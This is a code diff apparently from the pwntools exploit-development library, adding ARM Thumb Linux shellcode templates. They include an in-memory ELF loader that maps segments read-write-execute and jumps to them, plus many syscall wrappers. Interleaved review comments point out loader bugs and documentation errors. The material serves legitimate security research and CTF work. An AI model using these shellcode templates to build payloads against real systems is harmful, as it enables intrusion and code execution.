@@ -0,0 +1,173 @@ +<% + from pwnlib.shellcraft.thumb.linux import exit as exit + from pwnlib.shellcraft.thumb.linux import mmap + from pwnlib.shellcraft.thumb import setregs, mov, push, memcpy + + from pwnlib.shellcraft import common + from pwnlib.util.packing import unpack +%> +<%page args="address"/> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Arguments: + address(int): Address of the ELF as a register or integer. + +<% +elf_magic = unpack('\x7fELF') +die = common.label('die') +load_one = common.label('load_one') +next_phdr = common.label('next_phdr') +""" +Elf32_Ehdr + +0x0000 e_ident : unsigned char [16] + +0x0010 e_type : Elf32_Half + +0x0012 e_machine : Elf32_Half + +0x0014 e_version : Elf32_Word + +0x0018 e_entry : Elf32_Addr + +0x001c e_phoff : Elf32_Off + +0x0020 e_shoff : Elf32_Off + +0x0024 e_flags : Elf32_Word + +0x0028 e_ehsize : Elf32_Half + +0x002a e_phentsize : Elf32_Half + +0x002c e_phnum : Elf32_Half + +0x002e e_shentsize : Elf32_Half + +0x0030 e_shnum : Elf32_Half + +0x0032 e_shstrndx : Elf32_Half + +Elf32_Phdr + +0x0000 p_type : Elf32_Word + +0x0004 p_offset : Elf32_Off + +0x0008 p_vaddr : Elf32_Addr + +0x000c p_paddr : Elf32_Addr + +0x0010 p_filesz : Elf32_Word + +0x0014 p_memsz : Elf32_Word + +0x0018 p_flags : Elf32_Word + +0x001c p_align : Elf32_Word +""" +e_entry = 0x0018 +e_phoff = 0x001c +e_phnum = 0x002c +e_phentsize = 0x002a +p_type = 0x0000 +p_offset = 0x0004 +p_vaddr = 0x0008 +p_filesz = 0x0010 +p_memsz = 0x0014 + + +PT_LOAD = 1 +%> + + ${setregs({'r0': address})} + + /* Check the ELF header */ + ldr r1, [r0] + ${mov('r2', elf_magic)} + cmp r1, r2 + bne ${die} + + /* Discover program headers */ + add r1, r0, #${e_phoff} + ldr r1, [r1] + add r1, r0 /* r1 = &program headers */ + + add r2, r0, #${e_phentsize} + ldrh r2, [r2] /* r2 = program header size */ + + add r3, r0, #${e_phnum} + ldrh r3, [r3] /* r3 = number of program headers */ + +1: + /* For each section header, mmap it to the desired address 
*/ + push {r0, r1, r2, r3} + bl ${load_one} + pop {r0, r1, r2, r3} + add r1, r2 + subs r3, #1 + bne 1b + + /* Everything is loaded and RWX. Find the entry point and call it */ + add r1, r0, #${e_entry} + ldr r1, [r1] + mov lr, r1 + + /* Set up the fake stack. + For whatever reason, ARM binaries really want AT_RANDOM + to be available. */ + /* AT_NULL */ + eor r0, r0 + eor r1, r1 + push {r0, r1} + /* AT_RANDOM */ + mov r0, #25 + mov r1, sp + push {r0, r1} + + /* argc, argv, envp */ + eor r0, r0 + eor r1, r1 + eor r2, r2 + push {r0, r1, r2} + + /* Invoke the entry point */ + push {lr} + pop {pc} + +${load_one}: + /* r1 = &program headers */ + push {fp, lr} + mov fp, sp + + /* If it's not a PT_LOAD header, don't care */ + add r2, r1, #${p_type} + ldr r2, [r2] + uxth r2, r2 /* zero-extend halfword */ + cmp r2, #${PT_LOAD} + bne ${next_phdr} + + /* Get the destination address into r2 */ + add r2, r1, ${p_vaddr} + ldr r2, [r2] + + /* Get the size to mmap into r3 */ + add r3, r1, #${p_memsz} + ldr r3, [r3] + lsr r3, #12 + add r3, r3, #1 + + /* We can't move the program break with brk(), + so we basically have to fake it. Allocate + more space than we ever expect the heap to + need, by over-allocating space by 8x */ + lsl r3, #12 + 4 + + /* Map the page in */ + push {r0-r12} + lsr r2, #12 + lsl r2, #12 + ${mmap('r2', 'r3', 'PROT_READ|PROT_WRITE|PROT_EXEC', 'MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED', 0, 0)} + /* Ignore failure */ + pop {r0-r12} + + /* Get the source address into r4 */ + add r4, r1, #${p_offset} + ldr r4, [r4] + add r4, r0 + + /* Get the number of bytes into r5 */ + add r5, r1, #${p_filesz} + ldr r5, [r5] + + /* Copy the data */ + push {r0-r4} + ${memcpy('r2','r4','r5')} + pop {r0-r4} + +${next_phdr}: + mov sp, fp + pop {fp, lr} + bx lr + +${die}: + ${exit(1)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/loader_append.asm b/pwnlib/shellcraft/templates/thumb/linux/loader_append.asm new file mode 100644 index 000000000..656537e06 --- /dev/null 
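Review bot: The program-header loop at `1:` is a do-while on `subs r3, #1` / `bne 1b`, so an ELF whose e_phnum is 0 — the only header validation is the magic compare against `elf_magic` — wraps r3 to 0xFFFFFFFF and walks billions of bogus headers, each passed to mmap with MAP_FIXED; a `cmp r3, #0` / `beq ${die}` before the label closes that. `mov r1, sp` makes AT_RANDOM point at the zeroed AT_NULL pair just pushed, and glibc derives the stack-protector canary and pointer guard from those 16 bytes, so the loaded program runs with predictable guards — acceptable for a loader stub, but it should be stated in the docstring. The comment "over-allocating space by 8x" above `lsl r3, #12 + 4` does not match the code, which shifts the page count left by 16 and so reserves 16 times the page-rounded p_memsz. Finally, "Ignore failure" after the mmap means a failed MAP_FIXED mapping is followed by `${memcpy('r2','r4','r5')}` into an address that may never have been mapped, while a successful mapping that overlaps the loader's own code or stack silently clobbers it; the loader_append doctest avoids the latter with -Ttext-segment=0x20000000, and that precondition belongs in the `address` argument's documentation.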
+++ b/pwnlib/shellcraft/templates/thumb/linux/loader_append.asm @@ -0,0 +1,52 @@ +<% + from pwnlib.shellcraft.thumb.linux import loader + from pwnlib.shellcraft import common +%> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Similar to loader.asm but loads an appended ELF. + +Arguments: + data(str): If a valid filename, the data is loaded from the named file. + Otherwise, this is treated as raw ELF data to append. + If ``None``, it is ignored. + +Example: + +The following doctest is commented out because it doesn't work on Travis +for reasons I cannot diagnose. However, it should work just fine :-) + + # >>> gcc = process(['arm-linux-gnueabihf-gcc','-xc','-static','-Wl,-Ttext-segment=0x20000000','-']) + # >>> gcc.write(''' + # ... int main() { + # ... printf("Hello, %s!\\n", "world"); + # ... } + # ... ''') + # >>> gcc.shutdown('send') + # >>> gcc.poll(True) + # 0 + # >>> sc = shellcraft.loader_append('a.out') + # >>> run_assembly(sc).recvline() + # 'Hello, world!\n' + + +<%page args="data = None"/> +<% +there = common.label('there') +here = common.label('here') +%> + add r0, pc, #0+(${there} - ${here}) +${here}: + ${loader('r0')} +${there}: +%if data: +<% +import os + +if os.path.isfile(data): + with open(data, 'rb') as f: + data = f.read() +%> + ${'.string "%s"' % ''.join('\\x%02x' % c for c in bytearray(data))} +%endif diff --git a/pwnlib/shellcraft/templates/thumb/linux/lseek.asm b/pwnlib/shellcraft/templates/thumb/linux/lseek.asm new file mode 100644 index 000000000..39ddccdf9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/lseek.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, offset, whence"/> +<%docstring> +Invokes the syscall lseek. See 'man 2 lseek' for more information. + +Arguments: + fd(int): fd + offset(off_t): offset + whence(int): whence + + + ${syscall('SYS_lseek', fd, offset, whence)} 
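Review bot: The `if os.path.isfile(data):` branch makes the raw-ELF path the docstring promises unreachable: any real ELF image contains NUL bytes (the header padding alone), and os.path.isfile on a string with an embedded NUL raises instead of returning False (TypeError on the Python 2 this targets, ValueError on Python 3 before 3.8), so callers can only ever pass a filename. Testing the data before the filesystem, `if data[:4] != '\x7fELF' and os.path.isfile(data):`, or guarding with `'\x00' not in data`, restores the documented behaviour. Since the doctest is commented out, neither path is exercised; a small test that passes bytes rather than a path would be worth adding once the Travis issue is resolved.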
diff --git a/pwnlib/shellcraft/templates/thumb/linux/lstat.asm b/pwnlib/shellcraft/templates/thumb/linux/lstat.asm new file mode 100644 index 000000000..d9fab24c7 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/lstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat. See 'man 2 lstat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_lstat', file, buf)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/lstat64.asm b/pwnlib/shellcraft/templates/thumb/linux/lstat64.asm new file mode 100644 index 000000000..c81535798 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/lstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat64. See 'man 2 lstat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_lstat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/madvise.asm b/pwnlib/shellcraft/templates/thumb/linux/madvise.asm new file mode 100644 index 000000000..c6638b871 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/madvise.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="addr, len, advice"/> +<%docstring> +Invokes the syscall madvise. See 'man 2 madvise' for more information. + +Arguments: + addr(void): addr + len(size_t): len + advice(int): advice + + + ${syscall('SYS_madvise', addr, len, advice)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mincore.asm b/pwnlib/shellcraft/templates/thumb/linux/mincore.asm new file mode 100644 index 000000000..98a782c99 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mincore.asm 
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="start, len, vec"/>
+<%docstring>
+Invokes the syscall mincore. See 'man 2 mincore' for more information.
+
+Arguments:
+ start(void): start
+ len(size_t): len
+ vec(unsigned): vec
+
+
+ ${syscall('SYS_mincore', start, len, vec)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mkdir.asm b/pwnlib/shellcraft/templates/thumb/linux/mkdir.asm
new file mode 100644
index 000000000..07dc27490
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mkdir.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="path, mode"/>
+<%docstring>
+Invokes the syscall mkdir. See 'man 2 mkdir' for more information.
+
+Arguments:
+ path(char): path
+ mode(mode_t): mode
+
+
+ ${syscall('SYS_mkdir', path, mode)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mkdirat.asm b/pwnlib/shellcraft/templates/thumb/linux/mkdirat.asm
new file mode 100644
index 000000000..b2e9cc3f8
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mkdirat.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, path, mode"/>
+<%docstring>
+Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information.
+
+Arguments:
+ fd(int): fd
+ path(char): path
+ mode(mode_t): mode
+
+
+ ${syscall('SYS_mkdirat', fd, path, mode)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mknod.asm b/pwnlib/shellcraft/templates/thumb/linux/mknod.asm
new file mode 100644
index 000000000..8543932e0
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mknod.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="path, mode, dev"/>
+<%docstring>
+Invokes the syscall mknod. See 'man 2 mknod' for more information.
+
+Arguments:
+ path(char): path
+ mode(mode_t): mode
+ dev(dev_t): dev
+
+
+ ${syscall('SYS_mknod', path, mode, dev)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mknodat.asm b/pwnlib/shellcraft/templates/thumb/linux/mknodat.asm
new file mode 100644
index 000000000..4a47b8560
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mknodat.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, path, mode, dev"/>
+<%docstring>
+Invokes the syscall mknodat. See 'man 2 mknodat' for more information.
+
+Arguments:
+ fd(int): fd
+ path(char): path
+ mode(mode_t): mode
+ dev(dev_t): dev
+
+
+ ${syscall('SYS_mknodat', fd, path, mode, dev)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mlock.asm b/pwnlib/shellcraft/templates/thumb/linux/mlock.asm
new file mode 100644
index 000000000..c1106b639
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mlock.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="addr, len"/>
+<%docstring>
+Invokes the syscall mlock. See 'man 2 mlock' for more information.
+
+Arguments:
+ addr(void): addr
+ len(size_t): len
+
+
+ ${syscall('SYS_mlock', addr, len)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mlockall.asm b/pwnlib/shellcraft/templates/thumb/linux/mlockall.asm
new file mode 100644
index 000000000..f7c3202b9
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mlockall.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="flags"/>
+<%docstring>
+Invokes the syscall mlockall. See 'man 2 mlockall' for more information.
+
+Arguments:
+ flags(int): flags
+
+
+ ${syscall('SYS_mlockall', flags)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mmap.asm b/pwnlib/shellcraft/templates/thumb/linux/mmap.asm
new file mode 100644
index 000000000..2819ac3fa
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mmap.asm
@@ -0,0 +1,18 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="addr, length, prot, flags, fd, offset"/>
+<%docstring>
+Invokes the syscall mmap. See 'man 2 mmap' for more information.
+
+Arguments:
+ addr(void): addr
+ length(size_t): length
+ prot(int): prot
+ flags(int): flags
+ fd(int): fd
+ offset(off_t): offset
+
+
+ ${syscall('SYS_mmap2', addr, length, prot, flags, fd, offset)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mov.asm b/pwnlib/shellcraft/templates/thumb/linux/mov.asm
deleted file mode 100644
index 5fe07db34..000000000
--- a/pwnlib/shellcraft/templates/thumb/linux/mov.asm
+++ /dev/null
@@ -1,20 +0,0 @@
-<%
- from pwnlib.shellcraft import thumb
- from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context
-%>
-<%page args="dest, src"/>
-<%docstring>
-
-Thin wrapper around :func:`pwnlib.shellcraft.thumb.mov`, which sets
-`context.os` to `'linux'` before calling.
-
-Example:
-
- >>> print pwnlib.shellcraft.thumb.linux.mov('r1', 'SYS_execve').rstrip()
- mov r1, #(SYS_execve)
-
-
-
-% with ctx.local(os = 'linux'):
- ${thumb.mov(dest, src)}
-% endwith
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mov.asm b/pwnlib/shellcraft/templates/thumb/linux/mov.asm
new file mode 120000
index 000000000..92f037c18
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mov.asm
@@ -0,0 +1 @@
+../mov.asm
\ No newline at end of file
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mprotect.asm b/pwnlib/shellcraft/templates/thumb/linux/mprotect.asm
new file mode 100644
index 000000000..e8b108295
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mprotect.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="addr, len, prot"/>
+<%docstring>
+Invokes the syscall mprotect. See 'man 2 mprotect' for more information.
+
+Arguments:
+ addr(void): addr
+ len(size_t): len
+ prot(int): prot
+
+
+ ${syscall('SYS_mprotect', addr, len, prot)}
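Review bot: The mmap template's last line invokes `SYS_mmap2` while its docstring describes the final parameter as `offset(off_t): offset`; mmap2 takes that argument in 4096-byte page units rather than bytes, so a caller who passes a byte offset as the man page for mmap suggests maps the wrong file position. The docstring should say which call is made and in which unit, e.g. `offset(off_t): offset in 4096-byte pages (this template issues mmap2, not mmap)`. Nothing in the hunk shows whether the generator can express this distinction, so it may need a hand-maintained override for this file.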
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mq_notify.asm b/pwnlib/shellcraft/templates/thumb/linux/mq_notify.asm
new file mode 100644
index 000000000..3fddbe3a1
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mq_notify.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="mqdes, notification"/>
+<%docstring>
+Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information.
+
+Arguments:
+ mqdes(mqd_t): mqdes
+ notification(sigevent): notification
+
+
+ ${syscall('SYS_mq_notify', mqdes, notification)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mq_open.asm b/pwnlib/shellcraft/templates/thumb/linux/mq_open.asm
new file mode 100644
index 000000000..aa2b9f8c1
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mq_open.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="name, oflag, vararg"/>
+<%docstring>
+Invokes the syscall mq_open. See 'man 2 mq_open' for more information.
+
+Arguments:
+ name(char): name
+ oflag(int): oflag
+ vararg(int): vararg
+
+
+ ${syscall('SYS_mq_open', name, oflag, vararg)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/thumb/linux/mq_timedreceive.asm
new file mode 100644
index 000000000..b93ecacda
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mq_timedreceive.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/>
+<%docstring>
+Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information.
+
+Arguments:
+ mqdes(mqd_t): mqdes
+ msg_ptr(char): msg_ptr
+ msg_len(size_t): msg_len
+ msg_prio(unsigned): msg_prio
+ abs_timeout(timespec): abs_timeout
+
+
+ ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/thumb/linux/mq_timedsend.asm
new file mode 100644
index 000000000..3521a3c35
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mq_timedsend.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/>
+<%docstring>
+Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information.
+
+Arguments:
+ mqdes(mqd_t): mqdes
+ msg_ptr(char): msg_ptr
+ msg_len(size_t): msg_len
+ msg_prio(unsigned): msg_prio
+ abs_timeout(timespec): abs_timeout
+
+
+ ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/thumb/linux/mq_unlink.asm
new file mode 100644
index 000000000..a536bba54
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mq_unlink.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="name"/>
+<%docstring>
+Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information.
+
+Arguments:
+ name(char): name
+
+
+ ${syscall('SYS_mq_unlink', name)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/mremap.asm b/pwnlib/shellcraft/templates/thumb/linux/mremap.asm
new file mode 100644
index 000000000..de78d805a
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/mremap.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="addr, old_len, new_len, flags, vararg"/>
+<%docstring>
+Invokes the syscall mremap. See 'man 2 mremap' for more information.
+
+Arguments:
+ addr(void): addr
+ old_len(size_t): old_len
+ new_len(size_t): new_len
+ flags(int): flags
+ vararg(int): vararg
+
+
+ ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/msync.asm b/pwnlib/shellcraft/templates/thumb/linux/msync.asm
new file mode 100644
index 000000000..756ba0102
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/msync.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="addr, len, flags"/>
+<%docstring>
+Invokes the syscall msync. See 'man 2 msync' for more information.
+
+Arguments:
+ addr(void): addr
+ len(size_t): len
+ flags(int): flags
+
+
+ ${syscall('SYS_msync', addr, len, flags)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/munlock.asm b/pwnlib/shellcraft/templates/thumb/linux/munlock.asm
new file mode 100644
index 000000000..53c37dc25
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/munlock.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="addr, len"/>
+<%docstring>
+Invokes the syscall munlock. See 'man 2 munlock' for more information.
+
+Arguments:
+ addr(void): addr
+ len(size_t): len
+
+
+ ${syscall('SYS_munlock', addr, len)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/munlockall.asm b/pwnlib/shellcraft/templates/thumb/linux/munlockall.asm
new file mode 100644
index 000000000..0e8ea0252
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/munlockall.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall munlockall. See 'man 2 munlockall' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_munlockall')}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/munmap.asm b/pwnlib/shellcraft/templates/thumb/linux/munmap.asm
new file mode 100644
index 000000000..9f3f5ae81
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/munmap.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="addr, len"/>
+<%docstring>
+Invokes the syscall munmap. See 'man 2 munmap' for more information.
+
+Arguments:
+ addr(void): addr
+ len(size_t): len
+
+
+ ${syscall('SYS_munmap', addr, len)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/nanosleep.asm b/pwnlib/shellcraft/templates/thumb/linux/nanosleep.asm
new file mode 100644
index 000000000..9adb867c4
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/nanosleep.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="requested_time, remaining"/>
+<%docstring>
+Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information.
+
+Arguments:
+ requested_time(timespec): requested_time
+ remaining(timespec): remaining
+
+
+ ${syscall('SYS_nanosleep', requested_time, remaining)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/nice.asm b/pwnlib/shellcraft/templates/thumb/linux/nice.asm
new file mode 100644
index 000000000..f129a79e0
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/nice.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="inc"/>
+<%docstring>
+Invokes the syscall nice. See 'man 2 nice' for more information.
+
+Arguments:
+ inc(int): inc
+
+
+ ${syscall('SYS_nice', inc)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/open.asm b/pwnlib/shellcraft/templates/thumb/linux/open.asm
new file mode 100644
index 000000000..a6de52f33
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/open.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="file, oflag, vararg"/>
+<%docstring>
+Invokes the syscall open. See 'man 2 open' for more information.
+
+Arguments:
+ file(char): file
+ oflag(int): oflag
+ vararg(int): vararg
+
+
+ ${syscall('SYS_open', file, oflag, vararg)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/openat.asm b/pwnlib/shellcraft/templates/thumb/linux/openat.asm
new file mode 100644
index 000000000..c8aa0de4e
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/openat.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, file, oflag, vararg"/>
+<%docstring>
+Invokes the syscall openat. See 'man 2 openat' for more information.
+
+Arguments:
+ fd(int): fd
+ file(char): file
+ oflag(int): oflag
+ vararg(int): vararg
+
+
+ ${syscall('SYS_openat', fd, file, oflag, vararg)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/pause.asm b/pwnlib/shellcraft/templates/thumb/linux/pause.asm
new file mode 100644
index 000000000..cccaeef80
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/pause.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall pause. See 'man 2 pause' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_pause')}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/pipe.asm b/pwnlib/shellcraft/templates/thumb/linux/pipe.asm
new file mode 100644
index 000000000..454fb901b
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/pipe.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="pipedes"/>
+<%docstring>
+Invokes the syscall pipe. See 'man 2 pipe' for more information.
+
+Arguments:
+ pipedes(int): pipedes
+
+
+ ${syscall('SYS_pipe', pipedes)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/pipe2.asm b/pwnlib/shellcraft/templates/thumb/linux/pipe2.asm
new file mode 100644
index 000000000..20bc91d51
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/pipe2.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="pipedes, flags"/>
+<%docstring>
+Invokes the syscall pipe2. See 'man 2 pipe2' for more information.
+
+Arguments:
+ pipedes(int): pipedes
+ flags(int): flags
+
+
+ ${syscall('SYS_pipe2', pipedes, flags)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/poll.asm b/pwnlib/shellcraft/templates/thumb/linux/poll.asm
new file mode 100644
index 000000000..9191dc694
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/poll.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fds, nfds, timeout"/>
+<%docstring>
+Invokes the syscall poll. See 'man 2 poll' for more information.
+
+Arguments:
+ fds(pollfd): fds
+ nfds(nfds_t): nfds
+ timeout(int): timeout
+
+
+ ${syscall('SYS_poll', fds, nfds, timeout)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/ppoll.asm b/pwnlib/shellcraft/templates/thumb/linux/ppoll.asm
new file mode 100644
index 000000000..c9c64e524
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/ppoll.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fds, nfds, timeout, ss"/>
+<%docstring>
+Invokes the syscall ppoll. See 'man 2 ppoll' for more information.
+
+Arguments:
+ fds(pollfd): fds
+ nfds(nfds_t): nfds
+ timeout(timespec): timeout
+ ss(sigset_t): ss
+
+
+ ${syscall('SYS_ppoll', fds, nfds, timeout, ss)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/prctl.asm b/pwnlib/shellcraft/templates/thumb/linux/prctl.asm
new file mode 100644
index 000000000..95c13da9b
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/prctl.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="option, vararg"/>
+<%docstring>
+Invokes the syscall prctl. See 'man 2 prctl' for more information.
+
+Arguments:
+ option(int): option
+ vararg(int): vararg
+
+
+ ${syscall('SYS_prctl', option, vararg)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/pread.asm b/pwnlib/shellcraft/templates/thumb/linux/pread.asm
new file mode 100644
index 000000000..2332ade35
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/pread.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, buf, nbytes, offset"/>
+<%docstring>
+Invokes the syscall pread. See 'man 2 pread' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(void): buf
+ nbytes(size_t): nbytes
+ offset(off_t): offset
+
+
+ ${syscall('SYS_pread', fd, buf, nbytes, offset)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/preadv.asm b/pwnlib/shellcraft/templates/thumb/linux/preadv.asm
new file mode 100644
index 000000000..77bfc7d97
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/preadv.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, iovec, count, offset"/>
+<%docstring>
+Invokes the syscall preadv. See 'man 2 preadv' for more information.
+
